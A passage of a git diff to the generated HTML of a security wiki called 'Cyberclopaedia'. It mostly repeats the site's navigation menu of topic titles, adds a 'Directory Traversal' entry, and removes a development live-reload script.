      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -176,22 +176,6 @@

Networking

- - diff --git a/docs/Post Exploitation/Active Directory (AD)/Domain Data Enumeration with Bloodhound.html b/docs/Post Exploitation/Active Directory (AD)/Domain Data Enumeration with Bloodhound.html index b47deab0..ff6d4d72 100644 --- a/docs/Post Exploitation/Active Directory (AD)/Domain Data Enumeration with Bloodhound.html +++ b/docs/Post Exploitation/Active Directory (AD)/Domain Data Enumeration with Bloodhound.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -220,22 +220,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html b/docs/Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html index 2d51c93c..05a0157b 100644 --- a/docs/Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html +++ b/docs/Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
